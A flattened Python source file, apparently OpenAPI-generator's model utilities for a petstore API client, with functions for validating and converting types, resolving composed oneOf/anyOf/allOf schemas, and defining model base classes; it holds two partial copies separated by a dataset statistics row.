spec_property_naming (bool): True if the variable names in the input
data are serialized names as specified in the OpenAPI document.
False if the variables names in the input data are python
variable names in PEP-8 snake case.
_check_type: (boolean) if true, type will be checked and conversion
will be attempted.
configuration: (Configuration): the configuration class to use
when converting file_type items.
If passed, conversion will be attempted when possible
If not passed, no conversions will be attempted and
exceptions will be raised
Returns:
the correctly typed value
Raises:
ApiTypeError
"""
results = get_required_type_classes(required_types_mixed, spec_property_naming)
valid_classes, child_req_types_by_current_type = results
input_class_simple = get_simple_class(input_value)
valid_type = is_valid_type(input_class_simple, valid_classes)
if not valid_type:
if configuration:
# if input_value is not valid_type try to convert it
converted_instance = attempt_convert_item(
input_value,
valid_classes,
path_to_item,
configuration,
spec_property_naming,
key_type=False,
must_convert=True,
check_type=_check_type
)
return converted_instance
else:
raise get_type_error(input_value, path_to_item, valid_classes,
key_type=False)
# input_value's type is in valid_classes
if len(valid_classes) > 1 and configuration:
# there are valid classes which are not the current class
valid_classes_coercible = remove_uncoercible(
valid_classes, input_value, spec_property_naming, must_convert=False)
if valid_classes_coercible:
converted_instance = attempt_convert_item(
input_value,
valid_classes_coercible,
path_to_item,
configuration,
spec_property_naming,
key_type=False,
must_convert=False,
check_type=_check_type
)
return converted_instance
if child_req_types_by_current_type == {}:
# all types are of the required types and there are no more inner
# variables left to look at
return input_value
inner_required_types = child_req_types_by_current_type.get(
type(input_value)
)
if inner_required_types is None:
# for this type, there are not more inner variables left to look at
return input_value
if isinstance(input_value, list):
if input_value == []:
# allow an empty list
return input_value
for index, inner_value in enumerate(input_value):
inner_path = list(path_to_item)
inner_path.append(index)
input_value[index] = validate_and_convert_types(
inner_value,
inner_required_types,
inner_path,
spec_property_naming,
_check_type,
configuration=configuration
)
elif isinstance(input_value, dict):
if input_value == {}:
# allow an empty dict
return input_value
for inner_key, inner_val in input_value.items():
inner_path = list(path_to_item)
inner_path.append(inner_key)
if get_simple_class(inner_key) != str:
raise get_type_error(inner_key, inner_path, valid_classes,
key_type=True)
input_value[inner_key] = validate_and_convert_types(
inner_val,
inner_required_types,
inner_path,
spec_property_naming,
_check_type,
configuration=configuration
)
return input_value
def model_to_dict(model_instance, serialize=True):
"""Returns the model properties as a dict
Args:
model_instance (one of your model instances): the model instance that
will be converted to a dict.
Keyword Args:
serialize (bool): if True, the keys in the dict will be values from
attribute_map
"""
result = {}
model_instances = [model_instance]
if model_instance._composed_schemas:
model_instances.extend(model_instance._composed_instances)
for model_instance in model_instances:
for attr, value in model_instance._data_store.items():
if serialize:
# we use get here because additional property key names do not
# exist in attribute_map
attr = model_instance.attribute_map.get(attr, attr)
if isinstance(value, list):
if not value:
# empty list or None
result[attr] = value
else:
res = []
for v in value:
if isinstance(v, PRIMITIVE_TYPES) or v is None:
res.append(v)
elif isinstance(v, ModelSimple):
res.append(v.value)
else:
res.append(model_to_dict(v, serialize=serialize))
result[attr] = res
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0],
model_to_dict(item[1], serialize=serialize))
if hasattr(item[1], '_data_store') else item,
value.items()
))
elif isinstance(value, ModelSimple):
result[attr] = value.value
elif hasattr(value, '_data_store'):
result[attr] = model_to_dict(value, serialize=serialize)
else:
result[attr] = value
return result
def type_error_message(var_value=None, var_name=None, valid_classes=None,
key_type=None):
"""
Keyword Args:
var_value (any): the variable which has the type_error
var_name (str): the name of the variable which has the typ error
valid_classes (tuple): the accepted classes for current_item's
value
key_type (bool): False if our value is a value in a dict
True if it is a key in a dict
False if our item is an item in a list
"""
key_or_value = 'value'
if key_type:
key_or_value = 'key'
valid_classes_phrase = get_valid_classes_phrase(valid_classes)
msg = (
"Invalid type for variable '{0}'. Required {1} type {2} and "
"passed type was {3}".format(
var_name,
key_or_value,
valid_classes_phrase,
type(var_value).__name__,
)
)
return msg
def get_valid_classes_phrase(input_classes):
"""Returns a string phrase describing what types are allowed
"""
all_classes = list(input_classes)
all_classes = sorted(all_classes, key=lambda cls: cls.__name__)
all_class_names = [cls.__name__ for cls in all_classes]
if len(all_class_names) == 1:
return 'is {0}'.format(all_class_names[0])
return "is one of [{0}]".format(", ".join(all_class_names))
def convert_js_args_to_python_args(fn):
from functools import wraps
@wraps(fn)
def wrapped_init(_self, *args, **kwargs):
"""
An attribute named `self` received from the api will conflicts with the reserved `self`
parameter of a class method. During generation, `self` attributes are mapped
to `_self` in models. Here, we name `_self` instead of `self` to avoid conflicts.
"""
spec_property_naming = kwargs.get('_spec_property_naming', False)
if spec_property_naming:
kwargs = change_keys_js_to_python(kwargs, _self.__class__)
return fn(_self, *args, **kwargs)
return wrapped_init
def get_allof_instances(self, model_args, constant_args):
"""
Args:
self: the class we are handling
model_args (dict): var_name to var_value
used to make instances
constant_args (dict): var_name to var_value
used to make instances
Returns
composed_instances (list)
"""
composed_instances = []
for allof_class in self._composed_schemas['allOf']:
# no need to handle changing js keys to python because
# for composed schemas, allof parameters are included in the
# composed schema and were changed to python keys in __new__
# extract a dict of only required keys from fixed_model_args
kwargs = {}
var_names = set(allof_class.openapi_types.keys())
for var_name in var_names:
if var_name in model_args:
kwargs[var_name] = model_args[var_name]
# and use it to make the instance
kwargs.update(constant_args)
try:
allof_instance = allof_class(**kwargs)
composed_instances.append(allof_instance)
except Exception as ex:
raise ApiValueError(
"Invalid inputs given to generate an instance of '%s'. The "
"input data was invalid for the allOf schema '%s' in the composed "
"schema '%s'. Error=%s" % (
allof_class.__name__,
allof_class.__name__,
self.__class__.__name__,
str(ex)
)
) from ex
return composed_instances
def get_oneof_instance(cls, model_kwargs, constant_kwargs, model_arg=None):
"""
Find the oneOf schema that matches the input data (e.g. payload).
If exactly one schema matches the input data, an instance of that schema
is returned.
If zero or more than one schema match the input data, an exception is raised.
In OAS 3.x, the payload MUST, by validation, match exactly one of the
schemas described by oneOf.
Args:
cls: the class we are handling
model_kwargs (dict): var_name to var_value
The input data, e.g. the payload that must match a oneOf schema
in the OpenAPI document.
constant_kwargs (dict): var_name to var_value
args that every model requires, including configuration, server
and path to item.
Kwargs:
model_arg: (int, float, bool, str, date, datetime, ModelSimple, None):
the value to assign to a primitive class or ModelSimple class
Notes:
- this is only passed in when oneOf includes types which are not object
- None is used to suppress handling of model_arg, nullable models are handled in __new__
Returns
oneof_instance (instance)
"""
if len(cls._composed_schemas['oneOf']) == 0:
return None
oneof_instances = []
# Iterate over each oneOf schema and determine if the input data
# matches the oneOf schemas.
for oneof_class in cls._composed_schemas['oneOf']:
# The composed oneOf schema allows the 'null' type and the input data
# is the null value. This is a OAS >= 3.1 feature.
if oneof_class is none_type:
# skip none_types because we are deserializing dict data.
# none_type deserialization is handled in the __new__ method
continue
single_value_input = allows_single_value_input(oneof_class)
if not single_value_input:
# transform js keys from input data to python keys in fixed_model_args
fixed_model_args = change_keys_js_to_python(
model_kwargs, oneof_class)
# Extract a dict with the properties that are declared in the oneOf schema.
# Undeclared properties (e.g. properties that are allowed because of the
# additionalProperties attribute in the OAS document) are not added to
# the dict.
kwargs = {}
var_names = set(oneof_class.openapi_types.keys())
for var_name in var_names:
if var_name in fixed_model_args:
kwargs[var_name] = fixed_model_args[var_name]
# do not try to make a model with no input args
if len(kwargs) == 0:
continue
# and use it to make the instance
kwargs.update(constant_kwargs)
try:
if not single_value_input:
oneof_instance = oneof_class(**kwargs)
else:
if issubclass(oneof_class, ModelSimple):
oneof_instance = oneof_class(model_arg, **constant_kwargs)
elif oneof_class in PRIMITIVE_TYPES:
oneof_instance = validate_and_convert_types(
model_arg,
(oneof_class,),
constant_kwargs['_path_to_item'],
constant_kwargs['_spec_property_naming'],
constant_kwargs['_check_type'],
configuration=constant_kwargs['_configuration']
)
oneof_instances.append(oneof_instance)
except Exception:
pass
if len(oneof_instances) == 0:
raise ApiValueError(
"Invalid inputs given to generate an instance of %s. None "
"of the oneOf schemas matched the input data." %
cls.__name__
)
elif len(oneof_instances) > 1:
raise ApiValueError(
"Invalid inputs given to generate an instance of %s. Multiple "
"oneOf schemas matched the inputs, but a max of one is allowed." %
cls.__name__
)
return oneof_instances[0]
def get_anyof_instances(self, model_args, constant_args):
"""
Args:
self: the class we are handling
model_args (dict): var_name to var_value
The input data, e.g. the payload that must match at least one
anyOf child schema in the OpenAPI document.
constant_args (dict): var_name to var_value
args that every model requires, including configuration, server
and path to item.
Returns
anyof_instances (list)
"""
anyof_instances = []
if len(self._composed_schemas['anyOf']) == 0:
return anyof_instances
for anyof_class in self._composed_schemas['anyOf']:
# The composed oneOf schema allows the 'null' type and the input data
# is the null value. This is a OAS >= 3.1 feature.
if anyof_class is none_type:
# skip none_types because we are deserializing dict data.
# none_type deserialization is handled in the __new__ method
continue
# transform js keys to python keys in fixed_model_args
fixed_model_args = change_keys_js_to_python(model_args, anyof_class)
# extract a dict of only required keys from these_model_vars
kwargs = {}
var_names = set(anyof_class.openapi_types.keys())
for var_name in var_names:
if var_name in fixed_model_args:
kwargs[var_name] = fixed_model_args[var_name]
# do not try to make a model with no input args
if len(kwargs) == 0:
continue
# and use it to make the instance
kwargs.update(constant_args)
try:
anyof_instance = anyof_class(**kwargs)
anyof_instances.append(anyof_instance)
except Exception:
pass
if len(anyof_instances) == 0:
raise ApiValueError(
"Invalid inputs given to generate an instance of %s. None of the "
"anyOf schemas matched the inputs." %
self.__class__.__name__
)
return anyof_instances
def get_additional_properties_model_instances(
composed_instances, self):
additional_properties_model_instances = []
all_instances = [self]
all_instances.extend(composed_instances)
for instance in all_instances:
if instance.additional_properties_type is not None:
additional_properties_model_instances.append(instance)
return additional_properties_model_instances
def get_var_name_to_model_instances(self, composed_instances):
var_name_to_model_instances = {}
all_instances = [self]
all_instances.extend(composed_instances)
for instance in all_instances:
for var_name in instance.openapi_types:
if var_name not in var_name_to_model_instances:
var_name_to_model_instances[var_name] = [instance]
else:
var_name_to_model_instances[var_name].append(instance)
return var_name_to_model_instances
def get_unused_args(self, composed_instances, model_args):
unused_args = dict(model_args)
# arguments apssed to self were already converted to python names
# before __init__ was called
for var_name_py in self.attribute_map:
if var_name_py in unused_args:
del unused_args[var_name_py]
for instance in composed_instances:
if instance.__class__ in self._composed_schemas['allOf']:
for var_name_py in instance.attribute_map:
if var_name_py in unused_args:
del unused_args[var_name_py]
else:
for var_name_js in instance.attribute_map.values():
if var_name_js in unused_args:
del unused_args[var_name_js]
return unused_args
def validate_get_composed_info(constant_args, model_args, self):
"""
For composed schemas, generate schema instances for
all schemas in the oneOf/anyOf/allOf definition. If additional
properties are allowed, also assign those properties on
all matched schemas that contain additionalProperties.
Openapi schemas are python classes.
Exceptions are raised if:
- 0 or > 1 oneOf schema matches the model_args input data
- no anyOf schema matches the model_args input data
- any of the allOf schemas do not match the model_args input data
Args:
constant_args (dict): these are the args that every model requires
model_args (dict): these are the required and optional spec args that
were passed in to make this model
self (class): the class that we are instantiating
This class contains self._composed_schemas
Returns:
composed_info (list): length three
composed_instances (list): the composed instances which are not
self
var_name_to_model_instances (dict): a dict going from var_name
to the model_instance which holds that var_name
the model_instance may be self or an instance of one of the
classes in self.composed_instances()
additional_properties_model_instances (list): a list of the
model instances which have the property
additional_properties_type. This list can include self
"""
# create composed_instances
composed_instances = []
allof_instances = get_allof_instances(self, model_args, constant_args)
composed_instances.extend(allof_instances)
oneof_instance = get_oneof_instance(self.__class__, model_args, constant_args)
if oneof_instance is not None:
composed_instances.append(oneof_instance)
anyof_instances = get_anyof_instances(self, model_args, constant_args)
composed_instances.extend(anyof_instances)
# map variable names to composed_instances
var_name_to_model_instances = get_var_name_to_model_instances(
self, composed_instances)
# set additional_properties_model_instances
additional_properties_model_instances = (
get_additional_properties_model_instances(composed_instances, self)
)
# set any remaining values
unused_args = get_unused_args(self, composed_instances, model_args)
if len(unused_args) > 0 and \
len(additional_properties_model_instances) == 0 and \
(self._configuration is None or
not self._configuration.discard_unknown_keys):
raise ApiValueError(
"Invalid input arguments input when making an instance of "
"class %s. Not all inputs were used. The unused input data "
"is %s" % (self.__class__.__name__, unused_args)
)
# no need to add additional_properties to var_name_to_model_instances here
# because additional_properties_model_instances will direct us to that
# instance when we use getattr or setattr
# and we update var_name_to_model_instances in setattr
return [
composed_instances,
var_name_to_model_instances,
additional_properties_model_instances,
unused_args
]
| 39.449657 | 174 | 0.628721 |
from datetime import date, datetime
import inspect
import io
import os
import pprint
import re
import tempfile
from dateutil.parser import parse
from petstore_api.exceptions import (
ApiKeyError,
ApiAttributeError,
ApiTypeError,
ApiValueError,
)
none_type = type(None)
file_type = io.IOBase
class cached_property(object):
result_key = '_results'
def __init__(self, fn):
self._fn = fn
def __get__(self, instance, cls=None):
if self.result_key in vars(self):
return vars(self)[self.result_key]
else:
result = self._fn()
setattr(self, self.result_key, result)
return result
PRIMITIVE_TYPES = (list, float, int, bool, datetime, date, str, file_type)
def allows_single_value_input(cls):
if (
issubclass(cls, ModelSimple) or
cls in PRIMITIVE_TYPES
):
return True
elif issubclass(cls, ModelComposed):
if not cls._composed_schemas['oneOf']:
return False
return any(allows_single_value_input(c) for c in cls._composed_schemas['oneOf'])
return False
def composed_model_input_classes(cls):
if issubclass(cls, ModelSimple) or cls in PRIMITIVE_TYPES:
return [cls]
elif issubclass(cls, ModelNormal):
if cls.discriminator is None:
return [cls]
else:
return get_discriminated_classes(cls)
elif issubclass(cls, ModelComposed):
if not cls._composed_schemas['oneOf']:
return []
if cls.discriminator is None:
input_classes = []
for c in cls._composed_schemas['oneOf']:
input_classes.extend(composed_model_input_classes(c))
return input_classes
else:
return get_discriminated_classes(cls)
return []
class OpenApiModel(object):
def set_attribute(self, name, value):
path_to_item = []
if self._path_to_item:
path_to_item.extend(self._path_to_item)
path_to_item.append(name)
if name in self.openapi_types:
required_types_mixed = self.openapi_types[name]
elif self.additional_properties_type is None:
raise ApiAttributeError(
"{0} has no attribute '{1}'".format(
type(self).__name__, name),
path_to_item
)
elif self.additional_properties_type is not None:
required_types_mixed = self.additional_properties_type
if get_simple_class(name) != str:
error_msg = type_error_message(
var_name=name,
var_value=name,
valid_classes=(str,),
key_type=True
)
raise ApiTypeError(
error_msg,
path_to_item=path_to_item,
valid_classes=(str,),
key_type=True
)
if self._check_type:
value = validate_and_convert_types(
value, required_types_mixed, path_to_item, self._spec_property_naming,
self._check_type, configuration=self._configuration)
if (name,) in self.allowed_values:
check_allowed_values(
self.allowed_values,
(name,),
value
)
if (name,) in self.validations:
check_validations(
self.validations,
(name,),
value,
self._configuration
)
self.__dict__['_data_store'][name] = value
def __repr__(self):
return self.to_str()
def __ne__(self, other):
return not self == other
def __setattr__(self, attr, value):
self[attr] = value
def __getattr__(self, attr):
return self.__getitem__(attr)
def __new__(cls, *args, **kwargs):
if len(args) == 1:
arg = args[0]
if arg is None and is_type_nullable(cls):
return None
if issubclass(cls, ModelComposed) and allows_single_value_input(cls):
model_kwargs = {}
oneof_instance = get_oneof_instance(cls, model_kwargs, kwargs, model_arg=arg)
return oneof_instance
visited_composed_classes = kwargs.get('_visited_composed_classes', ())
if (
cls.discriminator is None or
cls in visited_composed_classes
):
# petType and we pass in "Dog", and the class Dog
# allOf includes Animal, we move through Animal
# once using the discriminator, and pick Dog.
# Then in the composed schema dog Dog, we will make an instance of the
# Animal class (because Dal has allOf: Animal) but this time we won't travel
# _visited_composed_classes = (Animal,)
return super(OpenApiModel, cls).__new__(cls)
# Get the name and value of the discriminator property.
# The discriminator name is obtained from the discriminator meta-data
# and the discriminator value is obtained from the input data.
discr_propertyname_py = list(cls.discriminator.keys())[0]
discr_propertyname_js = cls.attribute_map[discr_propertyname_py]
if discr_propertyname_js in kwargs:
discr_value = kwargs[discr_propertyname_js]
elif discr_propertyname_py in kwargs:
discr_value = kwargs[discr_propertyname_py]
else:
# The input data does not contain the discriminator property.
path_to_item = kwargs.get('_path_to_item', ())
raise ApiValueError(
"Cannot deserialize input data due to missing discriminator. "
"The discriminator property '%s' is missing at path: %s" %
(discr_propertyname_js, path_to_item)
)
# Implementation note: the last argument to get_discriminator_class
# is a list of visited classes. get_discriminator_class may recursively
# call itself and update the list of visited classes, and the initial
# value must be an empty list. Hence not using 'visited_composed_classes'
new_cls = get_discriminator_class(
cls, discr_propertyname_py, discr_value, [])
if new_cls is None:
path_to_item = kwargs.get('_path_to_item', ())
disc_prop_value = kwargs.get(
discr_propertyname_js, kwargs.get(discr_propertyname_py))
raise ApiValueError(
"Cannot deserialize input data due to invalid discriminator "
"value. The OpenAPI document has no mapping for discriminator "
"property '%s'='%s' at path: %s" %
(discr_propertyname_js, disc_prop_value, path_to_item)
)
if new_cls in visited_composed_classes:
# if we are making an instance of a composed schema Descendent
# which allOf includes Ancestor, then Ancestor contains
# a discriminator that includes Descendent.
# So if we make an instance of Descendent, we have to make an
# instance of Ancestor to hold the allOf properties.
# This code detects that use case and makes the instance of Ancestor
# For example:
# When making an instance of Dog, _visited_composed_classes = (Dog,)
# then we make an instance of Animal to include in dog._composed_instances
# so when we are here, cls is Animal
# cls.discriminator != None
# cls not in _visited_composed_classes
# new_cls = Dog
# but we know we know that we already have Dog
# because it is in visited_composed_classes
# so make Animal here
return super(OpenApiModel, cls).__new__(cls)
# Build a list containing all oneOf and anyOf descendants.
oneof_anyof_classes = None
if cls._composed_schemas is not None:
oneof_anyof_classes = (
cls._composed_schemas.get('oneOf', ()) +
cls._composed_schemas.get('anyOf', ()))
oneof_anyof_child = new_cls in oneof_anyof_classes
kwargs['_visited_composed_classes'] = visited_composed_classes + (cls,)
if cls._composed_schemas.get('allOf') and oneof_anyof_child:
# Validate that we can make self because when we make the
# new_cls it will not include the allOf validations in self
self_inst = super(OpenApiModel, cls).__new__(cls)
self_inst.__init__(*args, **kwargs)
new_inst = new_cls.__new__(new_cls, *args, **kwargs)
new_inst.__init__(*args, **kwargs)
return new_inst
class ModelSimple(OpenApiModel):
def __setitem__(self, name, value):
if name in self.required_properties:
self.__dict__[name] = value
return
self.set_attribute(name, value)
def get(self, name, default=None):
if name in self.required_properties:
return self.__dict__[name]
return self.__dict__['_data_store'].get(name, default)
def __getitem__(self, name):
if name in self:
return self.get(name)
raise ApiAttributeError(
"{0} has no attribute '{1}'".format(
type(self).__name__, name),
[e for e in [self._path_to_item, name] if e]
)
def __contains__(self, name):
if name in self.required_properties:
return name in self.__dict__
return name in self.__dict__['_data_store']
def to_str(self):
return str(self.value)
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
this_val = self._data_store['value']
that_val = other._data_store['value']
types = set()
types.add(this_val.__class__)
types.add(that_val.__class__)
vals_equal = this_val == that_val
return vals_equal
class ModelNormal(OpenApiModel):
def __setitem__(self, name, value):
if name in self.required_properties:
self.__dict__[name] = value
return
self.set_attribute(name, value)
def get(self, name, default=None):
if name in self.required_properties:
return self.__dict__[name]
return self.__dict__['_data_store'].get(name, default)
def __getitem__(self, name):
if name in self:
return self.get(name)
raise ApiAttributeError(
"{0} has no attribute '{1}'".format(
type(self).__name__, name),
[e for e in [self._path_to_item, name] if e]
)
def __contains__(self, name):
if name in self.required_properties:
return name in self.__dict__
return name in self.__dict__['_data_store']
def to_dict(self):
return model_to_dict(self, serialize=False)
def to_str(self):
return pprint.pformat(self.to_dict())
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
if not set(self._data_store.keys()) == set(other._data_store.keys()):
return False
for _var_name, this_val in self._data_store.items():
that_val = other._data_store[_var_name]
types = set()
types.add(this_val.__class__)
types.add(that_val.__class__)
vals_equal = this_val == that_val
if not vals_equal:
return False
return True
class ModelComposed(OpenApiModel):
def __setitem__(self, name, value):
if name in self.required_properties:
self.__dict__[name] = value
return
# set the attribute on the correct instance
model_instances = self._var_name_to_model_instances.get(
name, self._additional_properties_model_instances)
if model_instances:
for model_instance in model_instances:
if model_instance == self:
self.set_attribute(name, value)
else:
setattr(model_instance, name, value)
if name not in self._var_name_to_model_instances:
# we assigned an additional property
self.__dict__['_var_name_to_model_instances'][name] = (
model_instance
)
return None
raise ApiAttributeError(
"{0} has no attribute '{1}'".format(
type(self).__name__, name),
[e for e in [self._path_to_item, name] if e]
)
__unset_attribute_value__ = object()
def get(self, name, default=None):
if name in self.required_properties:
return self.__dict__[name]
# get the attribute from the correct instance
model_instances = self._var_name_to_model_instances.get(
name, self._additional_properties_model_instances)
values = []
# A composed model stores child (oneof/anyOf/allOf) models under
# self._var_name_to_model_instances. A named property can exist in
# multiple child models. If the property is present in more than one
# child model, the value must be the same across all the child models.
if model_instances:
for model_instance in model_instances:
if name in model_instance._data_store:
v = model_instance._data_store[name]
if v not in values:
values.append(v)
len_values = len(values)
if len_values == 0:
return default
elif len_values == 1:
return values[0]
elif len_values > 1:
raise ApiValueError(
"Values stored for property {0} in {1} differ when looking "
"at self and self's composed instances. All values must be "
"the same".format(name, type(self).__name__),
[e for e in [self._path_to_item, name] if e]
)
def __getitem__(self, name):
value = self.get(name, self.__unset_attribute_value__)
if value is self.__unset_attribute_value__:
raise ApiAttributeError(
"{0} has no attribute '{1}'".format(
type(self).__name__, name),
[e for e in [self._path_to_item, name] if e]
)
return value
def __contains__(self, name):
if name in self.required_properties:
return name in self.__dict__
model_instances = self._var_name_to_model_instances.get(
name, self._additional_properties_model_instances)
if model_instances:
for model_instance in model_instances:
if name in model_instance._data_store:
return True
return False
def to_dict(self):
return model_to_dict(self, serialize=False)
def to_str(self):
return pprint.pformat(self.to_dict())
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
if not set(self._data_store.keys()) == set(other._data_store.keys()):
return False
for _var_name, this_val in self._data_store.items():
that_val = other._data_store[_var_name]
types = set()
types.add(this_val.__class__)
types.add(that_val.__class__)
vals_equal = this_val == that_val
if not vals_equal:
return False
return True
COERCION_INDEX_BY_TYPE = {
ModelComposed: 0,
ModelNormal: 1,
ModelSimple: 2,
none_type: 3,
list: 4,
dict: 5,
float: 6,
int: 7,
bool: 8,
datetime: 9,
date: 10,
str: 11,
file_type: 12,
}
UPCONVERSION_TYPE_PAIRS = (
(str, datetime),
(str, date),
(int, float),
(list, ModelComposed),
(dict, ModelComposed),
(str, ModelComposed),
(int, ModelComposed),
(float, ModelComposed),
(list, ModelComposed),
(list, ModelNormal),
(dict, ModelNormal),
(str, ModelSimple),
(int, ModelSimple),
(float, ModelSimple),
(list, ModelSimple),
)
COERCIBLE_TYPE_PAIRS = {
False: (
),
True: (
(dict, ModelComposed),
(list, ModelComposed),
(dict, ModelNormal),
(list, ModelNormal),
(str, ModelSimple),
(int, ModelSimple),
(float, ModelSimple),
(list, ModelSimple),
(str, datetime),
(str, date),
(str, file_type)
),
}
def get_simple_class(input_value):
if isinstance(input_value, type):
return input_value
elif isinstance(input_value, tuple):
return tuple
elif isinstance(input_value, list):
return list
elif isinstance(input_value, dict):
return dict
elif isinstance(input_value, none_type):
return none_type
elif isinstance(input_value, file_type):
return file_type
elif isinstance(input_value, bool):
return bool
elif isinstance(input_value, int):
return int
elif isinstance(input_value, datetime):
return datetime
elif isinstance(input_value, date):
return date
elif isinstance(input_value, str):
return str
return type(input_value)
def check_allowed_values(allowed_values, input_variable_path, input_values):
these_allowed_values = list(allowed_values[input_variable_path].values())
if (isinstance(input_values, list)
and not set(input_values).issubset(
set(these_allowed_values))):
invalid_values = ", ".join(
map(str, set(input_values) - set(these_allowed_values))),
raise ApiValueError(
"Invalid values for `%s` [%s], must be a subset of [%s]" %
(
input_variable_path[0],
invalid_values,
", ".join(map(str, these_allowed_values))
)
)
elif (isinstance(input_values, dict)
and not set(
input_values.keys()).issubset(set(these_allowed_values))):
invalid_values = ", ".join(
map(str, set(input_values.keys()) - set(these_allowed_values)))
raise ApiValueError(
"Invalid keys in `%s` [%s], must be a subset of [%s]" %
(
input_variable_path[0],
invalid_values,
", ".join(map(str, these_allowed_values))
)
)
elif (not isinstance(input_values, (list, dict))
and input_values not in these_allowed_values):
raise ApiValueError(
"Invalid value for `%s` (%s), must be one of %s" %
(
input_variable_path[0],
input_values,
these_allowed_values
)
)
def is_json_validation_enabled(schema_keyword, configuration=None):
return (configuration is None or
not hasattr(configuration, '_disabled_client_side_validations') or
schema_keyword not in configuration._disabled_client_side_validations)
def check_validations(
validations, input_variable_path, input_values,
configuration=None):
if input_values is None:
return
current_validations = validations[input_variable_path]
if (is_json_validation_enabled('multipleOf', configuration) and
'multiple_of' in current_validations and
isinstance(input_values, (int, float)) and
not (float(input_values) / current_validations['multiple_of']).is_integer()):
raise ApiValueError(
"Invalid value for `%s`, value must be a multiple of "
"`%s`" % (
input_variable_path[0],
current_validations['multiple_of']
)
)
if (is_json_validation_enabled('maxLength', configuration) and
'max_length' in current_validations and
len(input_values) > current_validations['max_length']):
raise ApiValueError(
"Invalid value for `%s`, length must be less than or equal to "
"`%s`" % (
input_variable_path[0],
current_validations['max_length']
)
)
if (is_json_validation_enabled('minLength', configuration) and
'min_length' in current_validations and
len(input_values) < current_validations['min_length']):
raise ApiValueError(
"Invalid value for `%s`, length must be greater than or equal to "
"`%s`" % (
input_variable_path[0],
current_validations['min_length']
)
)
if (is_json_validation_enabled('maxItems', configuration) and
'max_items' in current_validations and
len(input_values) > current_validations['max_items']):
raise ApiValueError(
"Invalid value for `%s`, number of items must be less than or "
"equal to `%s`" % (
input_variable_path[0],
current_validations['max_items']
)
)
if (is_json_validation_enabled('minItems', configuration) and
'min_items' in current_validations and
len(input_values) < current_validations['min_items']):
raise ValueError(
"Invalid value for `%s`, number of items must be greater than or "
"equal to `%s`" % (
input_variable_path[0],
current_validations['min_items']
)
)
items = ('exclusive_maximum', 'inclusive_maximum', 'exclusive_minimum',
'inclusive_minimum')
if (any(item in current_validations for item in items)):
if isinstance(input_values, list):
max_val = max(input_values)
min_val = min(input_values)
elif isinstance(input_values, dict):
max_val = max(input_values.values())
min_val = min(input_values.values())
else:
max_val = input_values
min_val = input_values
if (is_json_validation_enabled('exclusiveMaximum', configuration) and
'exclusive_maximum' in current_validations and
max_val >= current_validations['exclusive_maximum']):
raise ApiValueError(
"Invalid value for `%s`, must be a value less than `%s`" % (
input_variable_path[0],
current_validations['exclusive_maximum']
)
)
if (is_json_validation_enabled('maximum', configuration) and
'inclusive_maximum' in current_validations and
max_val > current_validations['inclusive_maximum']):
raise ApiValueError(
"Invalid value for `%s`, must be a value less than or equal to "
"`%s`" % (
input_variable_path[0],
current_validations['inclusive_maximum']
)
)
if (is_json_validation_enabled('exclusiveMinimum', configuration) and
'exclusive_minimum' in current_validations and
min_val <= current_validations['exclusive_minimum']):
raise ApiValueError(
"Invalid value for `%s`, must be a value greater than `%s`" %
(
input_variable_path[0],
current_validations['exclusive_maximum']
)
)
if (is_json_validation_enabled('minimum', configuration) and
'inclusive_minimum' in current_validations and
min_val < current_validations['inclusive_minimum']):
raise ApiValueError(
"Invalid value for `%s`, must be a value greater than or equal "
"to `%s`" % (
input_variable_path[0],
current_validations['inclusive_minimum']
)
)
flags = current_validations.get('regex', {}).get('flags', 0)
if (is_json_validation_enabled('pattern', configuration) and
'regex' in current_validations and
not re.search(current_validations['regex']['pattern'],
input_values, flags=flags)):
err_msg = r"Invalid value for `%s`, must match regular expression `%s`" % (
input_variable_path[0],
current_validations['regex']['pattern']
)
if flags != 0:
# specified in the OAS document.
err_msg = r"%s with flags=`%s`" % (err_msg, flags)
raise ApiValueError(err_msg)
def order_response_types(required_types):
def index_getter(class_or_instance):
if isinstance(class_or_instance, list):
return COERCION_INDEX_BY_TYPE[list]
elif isinstance(class_or_instance, dict):
return COERCION_INDEX_BY_TYPE[dict]
elif (inspect.isclass(class_or_instance)
and issubclass(class_or_instance, ModelComposed)):
return COERCION_INDEX_BY_TYPE[ModelComposed]
elif (inspect.isclass(class_or_instance)
and issubclass(class_or_instance, ModelNormal)):
return COERCION_INDEX_BY_TYPE[ModelNormal]
elif (inspect.isclass(class_or_instance)
and issubclass(class_or_instance, ModelSimple)):
return COERCION_INDEX_BY_TYPE[ModelSimple]
elif class_or_instance in COERCION_INDEX_BY_TYPE:
return COERCION_INDEX_BY_TYPE[class_or_instance]
raise ApiValueError("Unsupported type: %s" % class_or_instance)
sorted_types = sorted(
required_types,
key=lambda class_or_instance: index_getter(class_or_instance)
)
return sorted_types
def remove_uncoercible(required_types_classes, current_item, spec_property_naming,
must_convert=True):
current_type_simple = get_simple_class(current_item)
results_classes = []
for required_type_class in required_types_classes:
# convert our models to OpenApiModel
required_type_class_simplified = required_type_class
if isinstance(required_type_class_simplified, type):
if issubclass(required_type_class_simplified, ModelComposed):
required_type_class_simplified = ModelComposed
elif issubclass(required_type_class_simplified, ModelNormal):
required_type_class_simplified = ModelNormal
elif issubclass(required_type_class_simplified, ModelSimple):
required_type_class_simplified = ModelSimple
if required_type_class_simplified == current_type_simple:
# don't consider converting to one's own class
continue
class_pair = (current_type_simple, required_type_class_simplified)
if must_convert and class_pair in COERCIBLE_TYPE_PAIRS[spec_property_naming]:
results_classes.append(required_type_class)
elif class_pair in UPCONVERSION_TYPE_PAIRS:
results_classes.append(required_type_class)
return results_classes
def get_discriminated_classes(cls):
possible_classes = []
key = list(cls.discriminator.keys())[0]
if is_type_nullable(cls):
possible_classes.append(cls)
for discr_cls in cls.discriminator[key].values():
if hasattr(discr_cls, 'discriminator') and discr_cls.discriminator is not None:
possible_classes.extend(get_discriminated_classes(discr_cls))
else:
possible_classes.append(discr_cls)
return possible_classes
def get_possible_classes(cls, from_server_context):
# TODO: lru_cache this
possible_classes = [cls]
if from_server_context:
return possible_classes
if hasattr(cls, 'discriminator') and cls.discriminator is not None:
possible_classes = []
possible_classes.extend(get_discriminated_classes(cls))
elif issubclass(cls, ModelComposed):
possible_classes.extend(composed_model_input_classes(cls))
return possible_classes
def get_required_type_classes(required_types_mixed, spec_property_naming):
valid_classes = []
child_req_types_by_current_type = {}
for required_type in required_types_mixed:
if isinstance(required_type, list):
valid_classes.append(list)
